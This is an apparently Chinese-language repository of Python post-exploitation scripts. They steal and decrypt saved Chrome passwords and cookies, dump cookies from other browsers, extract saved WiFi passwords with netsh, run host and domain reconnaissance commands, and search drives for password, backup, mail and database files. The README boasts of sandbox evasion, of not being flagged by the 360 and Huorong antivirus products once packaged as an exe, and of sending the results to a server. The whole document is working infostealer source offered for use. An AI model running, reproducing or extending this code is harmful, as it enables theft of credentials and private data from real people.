├── README.md ├── Result └── readme.md ├── getBowserInfo.py ├── getConWifiInfo.py ├── getHostInfo.py └── getSensitiveFile.py /README.md: -------------------------------------------------------------------------------- 1 | 绕简单沙箱,需要在同目录下创建Result文件夹才可正常运行 2 | 3 | ### 0x01 getBowserInfo 4 | Intro:获取各类浏览器的书签、浏览记录、cookie、存储的账号密码 5 | ![bowser](https://user-images.githubusercontent.com/52556245/135703768-8802d0ac-bbed-4871-a06a-c95ef4e569f9.png) 6 | 7 | ### 0x02 getConWifiInfo 8 | Intro:获取本地wifi账号密码 9 | ![wifi](https://user-images.githubusercontent.com/52556245/135703774-d05f1226-7209-43af-bf24-34431a2d6fca.png) 10 | 11 | ### 0x03 getSensitiveFile 12 | Intro:获取本地敏感文件、下载信息、聊天软件缓存及下载信息等 13 | ![sensitive](https://user-images.githubusercontent.com/52556245/135703777-e0e55f3a-c72e-443a-834d-eb69ab42bb7a.png) 14 | 15 | ### 0x04 getHostInfo 16 | Intro:获取本机硬件、网络、杀软、域环境、计划任务、服务、dns、软件等信息 17 | ![host](https://user-images.githubusercontent.com/52556245/135703781-77be348d-59f6-4870-910f-506ca6100941.png) 18 | 19 | ### 注: 20 | 可通过request发包把最后结果/文件发给服务器; 21 | 可通过三方模块打包成exe等集成环境,360、火绒等不会报毒哈。 22 | -------------------------------------------------------------------------------- /Result/readme.md: -------------------------------------------------------------------------------- 1 | ### 该文档保存结果为csv文档 -------------------------------------------------------------------------------- /getBowserInfo.py: -------------------------------------------------------------------------------- 1 | import os,sys 2 | import json 3 | import base64 4 | import sqlite3 5 | import win32crypt 6 | from Crypto.Cipher import AES 7 | import shutil 8 | from datetime import datetime, timedelta 9 | from cryptography.hazmat.backends import default_backend 10 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 11 | import browser_cookie3 12 | import requests 13 | import csv 14 | 15 | #初始化地址 16 | if 'win' in sys.platform: 17 | BookmarksPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Bookmarks') # 存在保存的书签 18 | localStatePath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Local State')# 存在AES加密密钥 19 | loginDataPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Login Data')# 存在保存的页面账号密码 20 | cookiesPath= os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies')# 存在cookie 21 | elif 'linux' in sys.platform: 22 | BookmarksPath = os.path.expanduser('~/.config/google-chrome/Default/Bookmarks') 23 | localStatePath = os.path.expanduser('~/.config/google-chrome/Local State') 24 | loginDataPath = os.path.expanduser('~/.config/chromium/Default/Login Data') 25 | cookiesPath = os.path.expanduser('~/.config/chromium/Default/Cookies') 26 | else:#Mac 27 | BookmarksPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Bookmarks') 28 | localStatePath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Local State') 29 | loginDataPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Login Data') 30 | cookiesPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Cookies') 31 | 32 | 33 | def getChromeTime(chromedate): # 转换时间 34 | try: 35 | return str(datetime(1601, 1, 1) + timedelta(microseconds=chromedate)) 36 | except: 37 | return '' 38 | 39 | def getEncKey(): # 获取加密AESkey 40 | with open(localStatePath, "r", encoding="utf-8") as f: 41 | localStateTest = f.read() 42 | localState = json.loads(localStateTest) 43 | key = base64.b64decode(localState["os_crypt"]["encrypted_key"])[5:] 44 | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 45 | 46 | #Chrome专属,可删除使用公用方法 47 | def getDecCookie(encCookie): # 获取解密后的Cookie 48 | if sys.platform == 'win32': 49 | try: 50 | if encCookie[:4] == b'x01x00x00x00': 51 | decCookie = dpapiDecrypt(encCookie) 52 | return decCookie.decode() 53 | elif encCookie[:3] == b'v10': 54 | decCookie = aesDecrypt(encCookie) 55 | return decCookie[:-16].decode() 56 | except WindowsError: 57 | return None 58 | else: 59 | raise WindowsError 60 | 61 | #Chrome专属,可删除使用公用方法 62 | def dpapiDecrypt(encCookie): # 使用DPAPI解密 63 | import ctypes 64 | import ctypes.wintypes 65 | 66 | class DATA_BLOB(ctypes.Structure): 67 | _fields_ = [('cbData', ctypes.wintypes.DWORD), 68 | ('pbData', ctypes.POINTER(ctypes.c_char))] 69 | 70 | p = ctypes.create_string_buffer(encCookie, len(encCookie)) 71 | blobin = DATA_BLOB(ctypes.sizeof(p), p) 72 | blobout = DATA_BLOB() 73 | retval = ctypes.windll.crypt32.CryptUnprotectData( 74 | ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout)) 75 | if not retval: 76 | raise ctypes.WinError() 77 | result = ctypes.string_at(blobout.pbData, blobout.cbData) 78 | ctypes.windll.kernel32.LocalFree(blobout.pbData) 79 | return result 80 | 81 | #Chrome专属,可删除使用公用方法 82 | def aesDecrypt(encCookie): # 使用AESkay解密 83 | key = getEncKey() 84 | nonce = encCookie[3:15] 85 | cipher = Cipher(algorithms.AES(key), None, backend=default_backend()) 86 | cipher.mode = modes.GCM(nonce) 87 | decryptor = cipher.decryptor() 88 | return decryptor.update(encCookie[15:]) 89 | 90 | def decPassword(password, key): # 解密密码 91 | try: 92 | iv = password[3:15] 93 | password = password[15:] 94 | cipher = AES.new(key, AES.MODE_GCM, iv) 95 | return cipher.decrypt(password)[:-16].decode() 96 | except: 97 | try: 98 | return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) 99 | except: 100 | return "" 101 | 102 | def getPassword(): # 获取密码 103 | csv_writer.writerow([ 'ID','【Chrome】url地址', '账号','密码','最后使用时间']) 104 | key = getEncKey() 105 | filename = "chromeLoginData.db" 106 | # 创建新chrome数据库文件,防止正在运行导致数据库锁定 107 | shutil.copyfile(loginDataPath, filename) 108 | db = sqlite3.connect(filename) 109 | db.text_factory = str 110 | cursor = db.cursor() 111 | cursor.execute("select origin_url, username_value, password_value, date_last_used from logins order by date_created") 112 | id=0 113 | for row in cursor.fetchall(): 114 | url = row[0] 115 | username = row[1] 116 | password = decPassword(row[2], key) 117 | dateLastUsed = row[3] 118 | if username or password: 119 | id=id+1 120 | print("\nURL: "+url) 121 | print("Username: "+username) 122 | print("Password: "+password) 123 | print("Last Used: "+getChromeTime(dateLastUsed)) 124 | csv_writer.writerow([ id, url, username,password,getChromeTime(dateLastUsed)]) 125 | else: 126 | continue 127 | cursor.close() 128 | db.close() 129 | csv_writer.writerow(' ') 130 | try: 131 | os.remove(filename) 132 | except: 133 | pass 134 | 135 | def formatCookiejar(cookiejar): # 格式化cookiejar对象并打印 136 | cookieList = str(cookiejar)[12:-3].split(">, <") 137 | newCookieList=[] 138 | id=0 139 | for i in range(len(cookieList)): 140 | id=id+1 141 | host=cookieList[i].split(" for ")[1] 142 | name=cookieList[i].split("Cookie ")[1].split("=")[0] 143 | cookie=cookieList[i].split("=")[1].split(" for ")[0] 144 | print('\nHost: %s\nName: %s\nCookie: %s'%(host,name,cookie)) 145 | csv_writer.writerow([ id, host, name, cookie]) 146 | 147 | def getCookie(): # 获取cookie 148 | try: 149 | chromeCookie = browser_cookie3.chrome() 150 | print('\n\n-------------Chrome浏览器Cookie如下:-------------') 151 | getChromeCookie() 152 | except: 153 | try: 154 | csv_writer.writerow([ 'ID','【Chrome】url地址', 'Name', 'Cookie']) 155 | formatCookiejar(chromeCookie) 156 | csv_writer.writerow(' ') 157 | except: 158 | chromeCookie = [] 159 | csv_writer.writerow([ ' ','未检测到Chrome浏览器', ' ', ' ']) 160 | csv_writer.writerow(' ') 161 | print('\n未检测到Chrome浏览器') 162 | try: 163 | firefoxCookie = browser_cookie3.firefox() 164 | csv_writer.writerow([ 'ID','【Firefox】url地址', 'Name', 'Cookie']) 165 | print('\n\n-------------Firefox浏览器Cookie如下:-------------') 166 | formatCookiejar(firefoxCookie) 167 | csv_writer.writerow(' ') 168 | except: 169 | firefoxCookie = [] 170 | csv_writer.writerow([ ' ','未检测到Firefox浏览器', ' ', ' ']) 171 | csv_writer.writerow(' ') 172 | print('\n未检测到Firefox浏览器') 173 | try: 174 | operaCookie = browser_cookie3.opera() 175 | csv_writer.writerow([ 'ID','【Opera】url地址', 'Name', 'Cookie']) 176 | print('\n\n-------------Opera浏览器Cookie如下:-------------') 177 | formatCookiejar(operaCookie) 178 | csv_writer.writerow(' ') 179 | except: 180 | operaCookie = [] 181 | csv_writer.writerow([ ' ','未检测到Opera浏览器', ' ', ' ']) 182 | csv_writer.writerow(' ') 183 | print('\n未检测到Opera浏览器') 184 | try: 185 | edgeCookie = browser_cookie3.edge() 186 | csv_writer.writerow([ 'ID','【Edge】url地址', 'Name', 'Cookie']) 187 | print('\n\n-------------Edge浏览器Cookie如下:-------------') 188 | formatCookiejar(edgeCookie) 189 | csv_writer.writerow(' ') 190 | except: 191 | edgeCookie = [] 192 | csv_writer.writerow([ ' ','未检测到Edge浏览器', ' ', ' ']) 193 | csv_writer.writerow(' ') 194 | print('\n未检测到Edge浏览器') 195 | try: 196 | chromiumCookie = browser_cookie3.chromium() 197 | csv_writer.writerow([ 'ID','【Chromium】url地址', 'Name', 'Cookie']) 198 | print('\n\n-------------Chromium浏览器Cookie如下:-------------') 199 | formatCookiejar(chromiumCookie) 200 | csv_writer.writerow(' ') 201 | except: 202 | chromiumCookie = [] 203 | csv_writer.writerow([ ' ','未检测到Chromium浏览器', ' ', ' ']) 204 | csv_writer.writerow(' ') 205 | print('\n未检测到Chromium浏览器') 206 | 207 | #Chrome专属,可删除使用公用方法 208 | def getChromeCookie(): # 获取cookie 209 | filename = "chromeCookieData.db" 210 | shutil.copyfile(cookiesPath, filename) 211 | db = sqlite3.connect(filename) 212 | cursor = db.cursor() 213 | cursor.execute("select host_key,path,name,encrypted_value,expires_utc from cookies")#需新版sqlite3,否则会报错encrypted_value无法转utf-8 214 | csv_writer.writerow([ 'ID','【Chrome】url地址', 'Path', 'Name', 'Cookie', '有效期']) 215 | id=0 216 | for row in cursor.fetchall(): 217 | try: 218 | host = row[0] 219 | path = row[1] 220 | name = row[2] 221 | encrypted_value = row[3] 222 | expires_utc =getChromeTime(row[4]) 223 | if encrypted_value: 224 | id=id+1 225 | print("\nHost: "+host) 226 | print("Path: "+path) 227 | print("Name: "+name) 228 | try: 229 | cookie=win32crypt.CryptUnprotectData(encrypted_value)[1].decode() # Chrome80.X版本前解密方式 230 | except Exception as e: 231 | cookie=getDecCookie(encrypted_value) # Chrome80.X版本后解密方式 232 | print("Cookie: "+cookie) 233 | print("Expires: "+expires_utc) 234 | csv_writer.writerow([ id, host, path, name, cookie, expires_utc]) 235 | except: 236 | continue 237 | cursor.close() 238 | db.close() 239 | csv_writer.writerow(' ') 240 | try: 241 | os.remove(filename) 242 | except: 243 | pass 244 | 245 | def forBookmarks(itemData,id): # 循环书签数据 246 | for item in itemData: 247 | type = item['type'] 248 | name = item['name'] 249 | if type == 'url': 250 | id = id+1 251 | print('\nTitle: ',name, '\nUrl: ',item['url']) 252 | csv_writer.writerow([ id,name,item['url']]) 253 | else: # 文件夹 254 | forBookmarks(item['children'],id) 255 | 256 | 257 | def getBookmarks(): # 获取书签 258 | csv_writer.writerow([ 'ID','【Chrome】书签名', 'url地址']) 259 | with open(BookmarksPath, 'r',encoding = "utf-8") as f: 260 | itemData=json.loads(f.read())['roots']['bookmark_bar']['children'] 261 | id=0 262 | forBookmarks(itemData,id) 263 | csv_writer.writerow(' ') 264 | 265 | 266 | def main(): 267 | print('\n-------------Chrome浏览器书签如下:-------------') 268 | getBookmarks() 269 | 270 | print('\n\n-------------Chrome浏览器密码如下:-------------') 271 | getPassword() 272 | print('\n\n-------------各浏览器Cookie如下:-------------') 273 | getCookie() 274 | 275 | if __name__ == "__main__": 276 | filename='./Result/bowserInfo.csv' 277 | with open(filename, 'w', encoding='utf-8', newline='') as q: 278 | csv_writer = csv.writer(q) 279 | main() -------------------------------------------------------------------------------- /getConWifiInfo.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import os 3 | import importlib,sys 4 | import csv 5 | importlib.reload(sys) 6 | 7 | 8 | # 获取电脑连接过的所有wifi名称和密码 9 | def checkWIFI(): 10 | list = [] 11 | # 获取所有的wifi名称 12 | message = os.popen('netsh wlan show profiles').readlines() 13 | print('正在解析中,请稍等……') 14 | for i in message: 15 | result = i.strip().encode().decode("utf-8") 16 | 17 | if result.find(u"所有用户配置文件 : ") != -1: 18 | command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear' 19 | try: 20 | per_wifi = os.popen(command).readlines() 21 | except: 22 | per_wifi = [] 23 | 24 | for j in per_wifi: 25 | passwd = j.strip().encode().decode("utf-8") 26 | 27 | if passwd.find(u"关键内容 :") != -1:# 密码字符串不为空时 28 | if passwd[18:] != '': 29 | list_temp = [] 30 | list_temp.append(result[11:]) 31 | list_temp.append(passwd[18:]) 32 | list.append(list_temp) 33 | return list 34 | 35 | if __name__ == "__main__": 36 | list = checkWIFI() 37 | print("返回结果如下:") 38 | filename='./Result/conWifiInfo.csv' 39 | with open(filename, 'w', encoding='utf-8', newline='') as q: 40 | csv_writer = csv.writer(q) 41 | csv_writer.writerow([ 'ID','wifi名称', '密码']) 42 | i = 0 43 | for j in list: 44 | i = i + 1 45 | print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1]) 46 | csv_writer.writerow([ i, j[0], j[1]]) -------------------------------------------------------------------------------- /getHostInfo.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import os,sys 3 | import csv 4 | 5 | cmdList={ 6 | #主机类 7 | "当前用户":"whoami /all", 8 | "网络信息":"ipconfig /all", 9 | "计算机版本/补丁编号":"systeminfo", 10 | "进程列表":"tasklist", 11 | "补丁信息":"wmic qfe", 12 | "系统信息":"wmic os", 13 | "机器运行信息":"net statistics workstation", 14 | "系统架构":"set process", 15 | "防火墙配置":"netsh firewall show config", 16 | "日志修改权限":"wmic nteventlog get path,filename,writeable", 17 | "当前在线用户":"quser", 18 | "本地用户":"net user", 19 | "本机管理员":"net localgroup administrators", 20 | "已安装软件信息":"wmic product get name,version", 21 | #杀软类 22 | "杀软信息":r"WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe", 23 | #网络类 24 | "端口信息":"netstat -ano", 25 | "路由信息":"route print", 26 | "arp信息":"arp -a", 27 | "host信息":"type c:\Windows\system32\drivers\etc\hosts", 28 | "wifi密码":"netsh wlan show profile", 29 | #计划任务类 30 | "计划任务":"schtasks", 31 | #服务类 32 | "自启服务":"wmic startup get command, caption", 33 | "已启服务":"net start", 34 | "本机服务":"wmic service list brief", 35 | #DNS服务 36 | "DNS服务器":"nslookup", 37 | "DNS缓存":"ipconfig /displaydns", 38 | "DNS服务器":"nslookup", 39 | #域信息 40 | "当前域信息":"net config workstation", 41 | "当前连接":"net use", 42 | "当前映射":"net share", 43 | "域环境":"net view", 44 | "定位域控":"net time", 45 | "定位域控":"net group \"domain controllers\" /domain", 46 | "域用户":"net user /domain", 47 | "域用户详情":"wmic useraccount get /all ", 48 | "域用户密码策略":"net accounts /domain", 49 | "本地用户组信息":"net localgroup", 50 | "域用户组信息":"net group /domain", 51 | "域用户组成员":"net \"Domain users\" /domain", 52 | "域管理员用户组成员":"net group \"Domain Admins\" /domain", 53 | "域管理员用户组成员":"net group \"Enterprise Admins\" /domain", 54 | "域信任信息":"nltest /domain_trusts", 55 | } 56 | choseList={} 57 | 58 | def main(): 59 | #可添加选择性执行,对应数据丢入choseList再执行 60 | #以下默认全部执行 61 | id=0 62 | for key,value in cmdList.items(): 63 | id=id+1 64 | print('\n\n-------------%s-------------'%key) 65 | message = os.popen(value).read() 66 | print(message) 67 | csv_writer.writerow([ id, key, message]) 68 | 69 | if __name__ == "__main__": 70 | filename='./Result/hostInfo.csv' 71 | with open(filename, 'w', encoding='utf-8', newline='') as q: 72 | csv_writer = csv.writer(q) 73 | csv_writer.writerow([ 'ID','类型', '信息']) 74 | main() -------------------------------------------------------------------------------- /getSensitiveFile.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import os,sys 3 | import csv 4 | 5 | cmdList={ 6 | "QQ文件":'dir /a /s /b "C:/Users/Administrator/Documents/Tencent Files/"|findstr "FileRecv.*\."', 7 | "微信文件":'dir /a /s /b "C:/Users/Administrator/Documents/WeChat Files/"|findstr "FileStorage.*\."', 8 | "下载文件":'dir /a /s /b "C:/Users/Administrator/Downloads"', 9 | "office数据库文件":'c: & dir /a /s /b "*.mdb" & d: & dir /a /s /b "*.mdb" & e: & dir /a /s /b "*.mdb"', 10 | "sql文件":'c: & dir /a /s /b "*.sql" & d: & dir /a /s /b "*.sql" & e: & dir /a /s /b "*.sql"', 11 | "虚拟光盘文件":'c: & dir /a /s /b "*.mdf" & d: & dir /a /s /b "*.mdf" & e: & dir /a /s /b "*.mdf"', 12 | "outlook电子邮件文件":'c: & dir /a /s /b "*.eml"', 13 | "outlook数据库文件":'c: & dir /a /s /b "*.pst"', 14 | "配置文件":'c: & dir /a /s /b "*.conf*" & d: & dir /a /s /b "*.conf*" & e: & dir /a /s /b "*.conf*"', 15 | "备份文件":'c: & dir /a /s /b "*bak*" & d: & dir /a /s /b "*bak*" & e: & dir /a /s /b "*bak*"', 16 | "密码文件":'c: & dir /a /s /b "*pwd*" & d: & dir /a /s /b "*pwd*" & e: & dir /a /s /b "*pwd*"', 17 | "密码文件":'c: & dir /a /s /b "*pass*" & d: & dir /a /s /b "*pass*" & e: & dir /a /s /b "*pass*"', 18 | #"登录文件":'c: & dir /a /s /b "*login*" & d: & dir /a /s /b "*login*" & e: & dir /a /s /b "*login*"', 19 | #"用户文件":'c: & dir /a /s /b "*user*" & d: & dir /a /s /b "*user*" & e: & dir /a /s /b "*user*"', 20 | } 21 | choseList={} 22 | 23 | def main(): 24 | #可添加选择性执行,对应数据丢入choseList再执行 25 | #以下默认全部执行 26 | #第一次运行比较慢,正常 27 | id=0 28 | for key,value in cmdList.items(): 29 | id = id + 1 30 | print('\n\n-------------%s-------------'%key) 31 | message = os.popen(value).read() 32 | print(message) 33 | csv_writer.writerow([ id, key, message]) 34 | #可以添加选择性读取某文件---我有。懒 35 | 36 | if __name__ == "__main__": 37 | filename='./Result/sensitiveFile.csv' 38 | with open(filename, 'w', encoding='utf-8', newline='') as q: 39 | csv_writer = csv.writer(q) 40 | csv_writer.writerow([ 'ID','类型', '路径']) 41 | main() --------------------------------------------------------------------------------